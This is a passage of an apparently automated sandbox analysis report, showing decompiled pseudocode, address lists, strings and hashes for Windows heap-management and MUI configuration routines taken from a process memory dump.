							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E011FB150();
				} else {
					E011FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E011FB150("Error code: %d - %s\n",  *0x12e5898);
				_t113 =  *0x12e58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E011FB150();
					} else {
						E011FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E011FB150("Parameter1: %p\n",  *0x12e58a4);
				}
				_t115 =  *0x12e58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E011FB150();
					} else {
						E011FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E011FB150("Parameter2: %p\n",  *0x12e58a8);
				}
				_t117 =  *0x12e58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E011FB150();
					} else {
						E011FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E011FB150("Parameter3: %p\n",  *0x12e58ac);
				}
				_t119 =  *0x12e58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E011FB150();
					} else {
						E011FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x12e58b4);
					E011FB150("Last known valid blocks: before - %p, after - %p\n",  *0x12e58b0);
				} else {
					_t120 =  *0x12e58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E011FB150();
				} else {
					E011FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E011FB150("Stack trace available at %p\n", 0x12e58c0);
			}











                                                                                                                0x012b1c10
                                                                                                                0x012b1c16
                                                                                                                0x012b1c1e
                                                                                                                0x012b1c3d
                                                                                                                0x012b1c3e
                                                                                                                0x012b1c20
                                                                                                                0x012b1c35
                                                                                                                0x012b1c3a
                                                                                                                0x012b1c44
                                                                                                                0x012b1c55
                                                                                                                0x012b1c5a
                                                                                                                0x012b1c65
                                                                                                                0x012b1c67
                                                                                                                0x00000000
                                                                                                                0x012b1c6e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012b1c67
                                                                                                                0x012b1cdc
                                                                                                                0x012b1ce5
                                                                                                                0x012b1d04
                                                                                                                0x012b1d05
                                                                                                                0x012b1ce7
                                                                                                                0x012b1cfc
                                                                                                                0x012b1d01
                                                                                                                0x012b1d0b
                                                                                                                0x012b1d17
                                                                                                                0x012b1d1f
                                                                                                                0x012b1d25
                                                                                                                0x012b1d30
                                                                                                                0x012b1d4f
                                                                                                                0x012b1d50
                                                                                                                0x012b1d32
                                                                                                                0x012b1d47
                                                                                                                0x012b1d4c
                                                                                                                0x012b1d61
                                                                                                                0x012b1d67
                                                                                                                0x012b1d68
                                                                                                                0x012b1d6e
                                                                                                                0x012b1d79
                                                                                                                0x012b1d98
                                                                                                                0x012b1d99
                                                                                                                0x012b1d7b
                                                                                                                0x012b1d90
                                                                                                                0x012b1d95
                                                                                                                0x012b1daa
                                                                                                                0x012b1db0
                                                                                                                0x012b1db1
                                                                                                                0x012b1db7
                                                                                                                0x012b1dc2
                                                                                                                0x012b1de1
                                                                                                                0x012b1de2
                                                                                                                0x012b1dc4
                                                                                                                0x012b1dd9
                                                                                                                0x012b1dde
                                                                                                                0x012b1df3
                                                                                                                0x012b1df9
                                                                                                                0x012b1dfa
                                                                                                                0x012b1e00
                                                                                                                0x012b1e0a
                                                                                                                0x012b1e13
                                                                                                                0x012b1e32
                                                                                                                0x012b1e33
                                                                                                                0x012b1e15
                                                                                                                0x012b1e2a
                                                                                                                0x012b1e2f
                                                                                                                0x012b1e39
                                                                                                                0x012b1e4a
                                                                                                                0x012b1e02
                                                                                                                0x012b1e02
                                                                                                                0x012b1e08
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012b1e08
                                                                                                                0x012b1e5b
                                                                                                                0x012b1e7a
                                                                                                                0x012b1e7b
                                                                                                                0x012b1e5d
                                                                                                                0x012b1e72
                                                                                                                0x012b1e77
                                                                                                                0x012b1e95

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                                • API String ID: 0-2897834094
                                                                                                                • Opcode ID: 47de776ce7d7a79505392b73ef52c12438ccdfe3e0bfd3b29d44d835e78ca444
                                                                                                                • Instruction ID: 1b75f567f3c2b031326d50b6ed42029239e346f71c1b03f8d9751d2a317c8d9f
                                                                                                                • Opcode Fuzzy Hash: 47de776ce7d7a79505392b73ef52c12438ccdfe3e0bfd3b29d44d835e78ca444
                                                                                                                • Instruction Fuzzy Hash: C561D737539546DFD619AB85F5EDE6073E4EB04B64B0D806EF6096B302D77098908F0A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01203D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E01203D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01201B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L012177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01201B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L012177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01201B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01201B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01201B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L012177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L012177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01214620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0123F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01241370(_t276, 0x11d4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0123BB40(0,  &_v68, _t170);
									if(L012043C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L012177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L012177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0123BB40(_t257,  &_v68, _t243);
								if(L012043C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01241370(_t278, 0x11d4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01214620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0123F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01241370(_v16, 0x11d4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0123BB40(_t262,  &_v68, _t244);
								if(L012043C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01241370(_t282, 0x11d4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0123BB40(_t262,  &_v68, _t201);
							if(L012043C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L012177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L012177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01214620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0123F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01241370(_t280, 0x11d4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0123BB40(_t267,  &_v68, _t245);
							if(L012043C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01241370(_t284, 0x11d4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0123BB40(_t267,  &_v68, _t224);
						if(L012043C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L012177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L012177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                                                0x01203d3c
                                                                                                                0x01203d42
                                                                                                                0x01203d44
                                                                                                                0x01203d46
                                                                                                                0x01203d49
                                                                                                                0x01203d4c
                                                                                                                0x01203d4f
                                                                                                                0x01203d52
                                                                                                                0x01203d55
                                                                                                                0x01203d58
                                                                                                                0x01203d5b
                                                                                                                0x01203d5f
                                                                                                                0x01203d61
                                                                                                                0x01203d66
                                                                                                                0x01258213
                                                                                                                0x01258218
                                                                                                                0x01204085
                                                                                                                0x01204088
                                                                                                                0x0120408e
                                                                                                                0x01204094
                                                                                                                0x0120409a
                                                                                                                0x012040a0
                                                                                                                0x012040a6
                                                                                                                0x012040a9
                                                                                                                0x012040af
                                                                                                                0x012040b6
                                                                                                                0x012040bd
                                                                                                                0x012040bd
                                                                                                                0x01203d83
                                                                                                                0x0125821f
                                                                                                                0x01258229
                                                                                                                0x01258238
                                                                                                                0x01258238
                                                                                                                0x0125823d
                                                                                                                0x0125823d
                                                                                                                0x01203da0
                                                                                                                0x01203daf
                                                                                                                0x01203db5
                                                                                                                0x01203dba
                                                                                                                0x01203dba
                                                                                                                0x01203dd4
                                                                                                                0x01203e94
                                                                                                                0x01203eab
                                                                                                                0x01203f6d
                                                                                                                0x01203f84
                                                                                                                0x0120406b
                                                                                                                0x0120406b
                                                                                                                0x0120406e
                                                                                                                0x0120406e
                                                                                                                0x01204070
                                                                                                                0x01204074
                                                                                                                0x01258351
                                                                                                                0x01258351
                                                                                                                0x0120407a
                                                                                                                0x0120407f
                                                                                                                0x0125835d
                                                                                                                0x01258370
                                                                                                                0x01258377
                                                                                                                0x01258379
                                                                                                                0x0125837c
                                                                                                                0x0125837c
                                                                                                                0x0125835d
                                                                                                                0x00000000
                                                                                                                0x0120407f
                                                                                                                0x01203f8a
                                                                                                                0x01203f8d
                                                                                                                0x01203f90
                                                                                                                0x01203f95
                                                                                                                0x0125830d
                                                                                                                0x0125830f
                                                                                                                0x01203f9b
                                                                                                                0x01203fac
                                                                                                                0x01203fae
                                                                                                                0x01203fb1
                                                                                                                0x01203fb1
                                                                                                                0x01203fb6
                                                                                                                0x01258317
                                                                                                                0x0125831a
                                                                                                                0x00000000
                                                                                                                0x01203fbc
                                                                                                                0x01203fc1
                                                                                                                0x01203fc9
                                                                                                                0x01203fd7
                                                                                                                0x01203fda
                                                                                                                0x01203fdd
                                                                                                                0x01204021
                                                                                                                0x01204021
                                                                                                                0x01204029
                                                                                                                0x01204030
                                                                                                                0x01204044
                                                                                                                0x01204046
                                                                                                                0x01204046
                                                                                                                0x01204044
                                                                                                                0x01204049
                                                                                                                0x01258327
                                                                                                                0x01258334
                                                                                                                0x01258339
                                                                                                                0x0125833c
                                                                                                                0x0120404f
                                                                                                                0x0120404f
                                                                                                                0x0120404f
                                                                                                                0x01204051
                                                                                                                0x01204056
                                                                                                                0x01204063
                                                                                                                0x01204063
                                                                                                                0x01204068
                                                                                                                0x00000000
                                                                                                                0x01204068
                                                                                                                0x01203fdf
                                                                                                                0x01203fe2
                                                                                                                0x01203fe4
                                                                                                                0x01203fe7
                                                                                                                0x01203fef
                                                                                                                0x01204003
                                                                                                                0x01204005
                                                                                                                0x01204005
                                                                                                                0x0120400c
                                                                                                                0x01204013
                                                                                                                0x01204016
                                                                                                                0x01204017
                                                                                                                0x0120401b
                                                                                                                0x0120401e
                                                                                                                0x00000000
                                                                                                                0x0120401e
                                                                                                                0x01203fb6
                                                                                                                0x01203eb1
                                                                                                                0x01203eb4
                                                                                                                0x01203eb7
                                                                                                                0x01203ebc
                                                                                                                0x012582a9
                                                                                                                0x012582ab
                                                                                                                0x01203ec2
                                                                                                                0x01203ed3
                                                                                                                0x01203ed5
                                                                                                                0x01203ed8
                                                                                                                0x01203ed8
                                                                                                                0x01203edd
                                                                                                                0x012582b3
                                                                                                                0x012582b6
                                                                                                                0x00000000
                                                                                                                0x01203ee3
                                                                                                                0x01203ee8
                                                                                                                0x01203eed
                                                                                                                0x01203ef0
                                                                                                                0x01203ef3
                                                                                                                0x01203f02
                                                                                                                0x01203f05
                                                                                                                0x01203f08
                                                                                                                0x012582c0
                                                                                                                0x012582c3
                                                                                                                0x012582c5
                                                                                                                0x012582c8
                                                                                                                0x012582d0
                                                                                                                0x012582e4
                                                                                                                0x012582e6
                                                                                                                0x012582e6
                                                                                                                0x012582ed
                                                                                                                0x012582f4
                                                                                                                0x012582f7
                                                                                                                0x012582f8
                                                                                                                0x012582fc
                                                                                                                0x012582ff
                                                                                                                0x012582ff
                                                                                                                0x01203f0e
                                                                                                                0x01203f11
                                                                                                                0x01203f16
                                                                                                                0x01203f1d
                                                                                                                0x01203f31
                                                                                                                0x01258307
                                                                                                                0x01258307
                                                                                                                0x01203f31
                                                                                                                0x01203f39
                                                                                                                0x01203f48
                                                                                                                0x01203f4d
                                                                                                                0x01203f50
                                                                                                                0x01203f50
                                                                                                                0x01203f53
                                                                                                                0x01203f58
                                                                                                                0x01203f65
                                                                                                                0x01203f65
                                                                                                                0x01203f6a
                                                                                                                0x00000000
                                                                                                                0x01203f6a
                                                                                                                0x01203edd
                                                                                                                0x01203dda
                                                                                                                0x01203ddd
                                                                                                                0x01203de0
                                                                                                                0x01203de5
                                                                                                                0x01258245
                                                                                                                0x01203deb
                                                                                                                0x01203df7
                                                                                                                0x01203dfc
                                                                                                                0x01203dfe
                                                                                                                0x01203e01
                                                                                                                0x01203e01
                                                                                                                0x01203e06
                                                                                                                0x0125824d
                                                                                                                0x0125824f
                                                                                                                0x01258254
                                                                                                                0x00000000
                                                                                                                0x01203e0c
                                                                                                                0x01203e11
                                                                                                                0x01203e16
                                                                                                                0x01203e19
                                                                                                                0x01203e29
                                                                                                                0x01203e2c
                                                                                                                0x01203e2f
                                                                                                                0x0125825c
                                                                                                                0x0125825f
                                                                                                                0x01258261
                                                                                                                0x01258264
                                                                                                                0x0125826c
                                                                                                                0x01258280
                                                                                                                0x01258282
                                                                                                                0x01258282
                                                                                                                0x01258289
                                                                                                                0x01258290
                                                                                                                0x01258293
                                                                                                                0x01258294
                                                                                                                0x01258298
                                                                                                                0x0125829b
                                                                                                                0x0125829b
                                                                                                                0x01203e35
                                                                                                                0x01203e38
                                                                                                                0x01203e3d
                                                                                                                0x01203e44
                                                                                                                0x01203e58
                                                                                                                0x012582a3
                                                                                                                0x012582a3
                                                                                                                0x01203e58
                                                                                                                0x01203e60
                                                                                                                0x01203e6f
                                                                                                                0x01203e74
                                                                                                                0x01203e77
                                                                                                                0x01203e77
                                                                                                                0x01203e7a
                                                                                                                0x01203e7f
                                                                                                                0x01203e8c
                                                                                                                0x01203e8c
                                                                                                                0x01203e91
                                                                                                                0x00000000
                                                                                                                0x01203e91

                                                                                                                Strings
                                                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 01203E97
                                                                                                                • Kernel-MUI-Number-Allowed, xrefs: 01203D8C
                                                                                                                • Kernel-MUI-Language-Allowed, xrefs: 01203DC0
                                                                                                                • Kernel-MUI-Language-SKU, xrefs: 01203F70
                                                                                                                • WindowsExcludedProcs, xrefs: 01203D6F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                • API String ID: 0-258546922
                                                                                                                • Opcode ID: e2a82924e1b4d4afae35701b4c526bc8ae354847570ac49b5d1dc66794ad826b
                                                                                                                • Instruction ID: 40f93b84f8f0331a4eb112a6187e4d6093e29daf48bbc9d0e77a6f943d7f8fcf
                                                                                                                • Opcode Fuzzy Hash: e2a82924e1b4d4afae35701b4c526bc8ae354847570ac49b5d1dc66794ad826b
                                                                                                                • Instruction Fuzzy Hash: 74F19272D20659EFCB16DF98C980AEEBBB9FF58640F10415AEA05E7251E7709E00CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 011F40E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 29%
                                                                                                                			E011F40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E011FB150();
					} else {
						E011FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E011FB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E011FB150(", passed to %s", _t29);
					}
					_push("\n");
					E011FB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x12e6378 = 1;
						asm("int3");
						 *0x12e6378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                                                                                0x011f40e6
                                                                                                                0x011f40e8
                                                                                                                0x011f40f1
                                                                                                                0x0125042d
                                                                                                                0x0125044c
                                                                                                                0x01250451
                                                                                                                0x0125042f
                                                                                                                0x01250444
                                                                                                                0x01250449
                                                                                                                0x0125045d
                                                                                                                0x01250466
                                                                                                                0x0125046e
                                                                                                                0x01250474
                                                                                                                0x01250475
                                                                                                                0x0125047a
                                                                                                                0x0125048a
                                                                                                                0x0125048c
                                                                                                                0x01250493
                                                                                                                0x01250494
                                                                                                                0x01250494
                                                                                                                0x00000000
                                                                                                                0x0125049b
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                                                                • API String ID: 0-188067316
                                                                                                                • Opcode ID: 73bec19fac3bf178b375e1e77f9218de51111f01cc65a77964699ddcb60a62d5
                                                                                                                • Instruction ID: dbfdc96560f93d55e617b1d142c0ccff6fd2ac02a7f85377fdb12fac41224029
                                                                                                                • Opcode Fuzzy Hash: 73bec19fac3bf178b375e1e77f9218de51111f01cc65a77964699ddcb60a62d5
                                                                                                                • Instruction Fuzzy Hash: 4A01FC322182429ED32D9769F84DF567BA4DB51F34F1D406DF6054B681CBB4A440C259
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0121A229, Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 69%
                                                                                                                			E0121A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E0121DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E01239730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E012BA80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E01239660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E011FB150();
					} else {
						E011FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E011FB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E01217D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E012B138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E01217D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E01217D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E012B1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E01217D50();
				_t125 = 0x7ffe038a;
